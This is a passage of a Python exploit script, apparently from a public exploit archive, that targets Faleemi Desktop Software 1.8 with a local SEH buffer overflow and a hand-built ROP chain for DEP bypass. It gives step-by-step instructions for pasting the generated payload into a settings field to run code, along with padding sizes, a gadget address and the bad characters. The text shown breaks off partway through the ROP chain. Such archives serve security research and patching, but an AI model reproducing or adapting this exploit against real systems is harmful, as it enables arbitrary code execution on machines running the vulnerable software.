#!/usr/bin/python # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) # Date: 01-26-19 # Vulnerable Software: Faleemi Desktop Software 1.8 # Vendor Homepage: https://www.faleemi.com/ # Version: 1.8.0 # Software Link 1: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe # Tested Windows 7 SP1 x86 # PoC # 1. run script # 2. open/copy contents of faleemidep.txt # 3. open app, click on System Setup # 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field # 5. click on save # 6. pop calc # manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds # practicing dep bypass by not using auto generated mona.py ropchains # original seh poc from Gionathan "John" Reale, EDB: 45402 # badchars; \x00\x0a\x0d\x2f import struct filename = "faleemidep.txt" junk = "A" * 264 #0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN seh = "\x7e\xea\x01\x60" fill = "C"*524 #VirtualAlloc() #EDI = ROP NOP (RETN) rop = struct.pack('